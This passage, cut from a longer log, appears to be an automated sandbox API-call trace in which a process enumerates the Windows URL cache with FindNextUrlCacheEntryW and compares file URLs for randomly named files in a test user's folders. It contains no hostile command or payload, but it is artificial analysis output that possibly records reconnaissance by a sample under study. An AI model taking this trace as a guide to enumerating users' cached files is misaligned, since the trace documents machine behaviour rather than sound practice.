lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned -1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned -1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned -1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned -1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned -1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.291] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3") returned 0x3f [0067.291] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3") returned 1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned -1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned -1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned -1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned -1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned -1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.291] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a") returned 0x3e [0067.291] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a") returned 1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3") returned 1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned 1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned 1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned -1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned 1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned 1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.291] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ") returned 0x39 [0067.291] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ") returned -1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a") returned 1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3") returned 1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned -1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.292] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv") returned 0x37 [0067.292] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv") returned 1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a") returned 1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3") returned 1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned 1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned 1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned 1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.292] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif") returned 0x50 [0067.292] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw", _String2="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv") returned 1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a") returned 1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3") returned 1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned 1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned 1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.292] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw") returned 0x3a [0067.292] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a") returned 1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3") returned 1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned -1 [0067.292] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.292] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg") returned 0x3f [0067.293] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg") returned -1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw") returned -1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif") returned -1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv") returned -1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ") returned -1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a") returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3") returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned -1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned -1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned -1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned -1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned -1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.293] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3") returned 0x48 [0067.293] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3") returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg") returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw") returned -1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif") returned -1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv") returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ") returned -1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a") returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3") returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned -1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned -1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned -1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.293] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a") returned 0x4a [0067.293] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a") returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3") returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg") returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw") returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif") returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv") returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ") returned -1 [0067.293] wcscmp 